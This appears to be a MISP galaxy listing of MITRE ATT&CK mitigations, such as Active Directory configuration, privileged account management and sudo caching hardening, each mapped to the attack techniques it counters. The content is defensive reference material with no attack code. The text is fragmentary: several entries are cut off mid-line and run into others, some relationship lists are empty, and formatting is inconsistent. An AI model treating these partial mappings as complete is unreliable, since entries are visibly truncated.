- mitigates: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" with estimative-
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**Active Directory Configuration - M1015**

Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.

The tag is: *misp-galaxy:mitre-course-of-action="Active Directory Configuration - M1015"*

Active Directory Configuration - M1015 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081"* with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178"* with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"* with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"* with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552"* with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005"* with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"

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**Accessibility Features Mitigation - T1015**

To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later. (Citation: TechNet RDP NLA)

If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network. (Citation: TechNet RDP Gateway)

Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="Accessibility Features Mitigation - T1015"*

Accessibility Features Mitigation - T1015 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"

**Table 4011. Table References**

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</table>
Plist Modification Mitigation - T1150

Prevent plist files from being modified by users by making them read-only.

The tag is: misp-galaxy:mitre-course-of-action="Plist Modification Mitigation - T1150"

Plist Modification Mitigation - T1150 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150" with estimative-language:likelihood-probability="almost-certain"

Systemd Service Mitigation - T1501

The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services.

The tag is: misp-galaxy:mitre-course-of-action="Systemd Service Mitigation - T1501"

Systemd Service Mitigation - T1501 has relationships with:

Shared Webroot Mitigation - T1051

Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.

Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Security) (Citation: NIST Server Security July 2008)

The tag is: misp-galaxy:mitre-course-of-action="Shared Webroot Mitigation - T1051"

Shared Webroot Mitigation - T1051 has relationships with:


Table 4014. Table References

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<td><a href="https://www.acunetix.com/websitesecurity/webserver-security/">https://www.acunetix.com/websitesecurity/webserver-security/</a></td>
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<td><a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf">https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf</a></td>
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</table>

Launch Daemon Mitigation - T1160

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.

The tag is: misp-galaxy:mitre-course-of-action="Launch Daemon Mitigation - T1160"

Launch Daemon Mitigation - T1160 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004" with estimative-language:likelihood-probability="almost-certain"

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</table>
File Deletion Mitigation - T1107

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File Deletion Mitigation - T1107"

File Deletion Mitigation - T1107 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4016. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1107">https://attack.mitre.org/mitigations/T1107</a></td>
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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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User Account Management - M1018

Manage the creation, modification, use, and permissions associated to user accounts.

The tag is: misp-galaxy:mitre-course-of-action="User Account Management - M1018"

User Account Management - M1018 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Launchctl - T1152" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Rc.common - T1163" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Service Dashboard - T1538" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012" with estimative-language:likelihood-probability="almost-certain"
Redundant Access Mitigation - T1108

Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: *misp-galaxy:mitre-course-of-action="Redundant Access Mitigation - T1108"*

Redundant Access Mitigation - T1108 has relationships with:

Component Firmware Mitigation - T1109

Prevent adversary access to privileged accounts or access necessary to perform this technique.

Consider removing and replacing system components suspected of being compromised.

The tag is: misp-galaxy:mitre-course-of-action="Component Firmware Mitigation - T1109"

Component Firmware Mitigation - T1109 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109" with estimative-language:likelihood-probability="almost-certain"

System Firmware Mitigation - T1019

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)

The tag is: misp-galaxy:mitre-course-of-action="System Firmware Mitigation - T1019"

System Firmware Mitigation - T1019 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-
Threat Intelligence Program - M1019

A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.

The tag is: `misp-galaxy:mitre-course-of-action="Threat Intelligence Program - M1019"`

Threat Intelligence Program - M1019 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"

Data Encrypted Mitigation - T1022

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Data Encrypted Mitigation - T1022"`

Data Encrypted Mitigation - T1022 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022"` with estimative-language:likelihood-probability="almost-certain"
Shortcut Modification Mitigation - T1023

Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)

Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Shortcut Modification Mitigation - T1023"

Shortcut Modification Mitigation - T1023 has relationships with:


Table 4023. Table References
User Execution Mitigation - T1204

Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Application whitelisting may be able to prevent the running of executables masquerading as other files.

If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .lnk, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and RAR that may be used to conceal malicious files in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct files in a way to avoid these systems.

The tag is: *misp-galaxy:mitre-course-of-action="User Execution Mitigation - T1204"*

User Execution Mitigation - T1204 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 4024. Table References

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Restrict Registry Permissions - M1024

Restrict the ability to modify certain hives or keys in the Windows Registry.

The tag is: *misp-galaxy:mitre-course-of-action="Restrict Registry Permissions - M1024"*

Restrict Registry Permissions - M1024 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058" with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Time Providers - T1209" with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-
User Account Control - M1052

Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.

The tag is: `misp-galaxy:mitre-course-of-action="User Account Control - M1052"`

User Account Control - M1052 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Application Shimming - T1138"` with estimator-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088"` with estimator-language:likelihood-probability="almost-certain"
Privileged Process Integrity - M1025

Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Process Integrity - M1025"

Privileged Process Integrity - M1025 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

Table 4027. Table References

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Port Knocking Mitigation - T1205

Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.

The tag is: misp-galaxy:mitre-course-of-action="Port Knocking Mitigation - T1205"

Port Knocking Mitigation - T1205 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 4028. Table References

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</table>

Privileged Account Management - M1026

Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Account Management - M1026"

Privileged Account Management - M1026 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with
estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-
• mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"


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• mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"

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- mitigates: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"
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- mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
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- mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"


Table 4029. Table References
Multiband Communication Mitigation - T1026

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multiband Communication Mitigation - T1026"

Multiband Communication Mitigation - T1026 has relationships with:


Table 4030. Table References

Links

https://attack.mitre.org/mitigations/T1026

Sudo Caching Mitigation - T1206

Setting the `<code>timestamp_timeout</code>` to 0 will require the user to input their password every time `<code>sudo</code>` is executed. Similarly, ensuring that the `<code>tty_tickets</code>` setting is enabled will prevent this leakage across tty sessions.

The tag is: misp-galaxy:mitre-course-of-action="Sudo Caching Mitigation - T1206"

Sudo Caching Mitigation - T1206 has relationships with:


Table 4031. Table References

Links

https://attack.mitre.org/mitigations/T1206

Operating System Configuration - M1028

Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
The tag is: misp-galaxy:mitre-course-of-action="Operating System Configuration - M1028"

Operating System Configuration - M1028 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-
• mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with
Remote Data Storage - M1029

Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

The tag is: `misp-galaxy:mitre-course-of-action="Remote Data Storage - M1029"`

Remote Data Storage - M1029 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565"` with estimative-language:likelihood-probability="almost-certain"
**Time Providers Mitigation - T1209**

Identify and block potentially malicious software that may be executed as a time provider by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

Consider using Group Policy to configure and block subsequent modifications to W32Time parameters. (Citation: Microsoft W32Time May 2017)

The tag is: *misp-galaxy:mitre-course-of-action=*"Time Providers Mitigation - T1209"

**Scheduled Transfer Mitigation - T1029**

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: *misp-galaxy:mitre-course-of-action=*"Scheduled Transfer Mitigation - T1029"

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**Table 4034. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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1886
Limit Software Installation - M1033

Block users or groups from installing unapproved software.

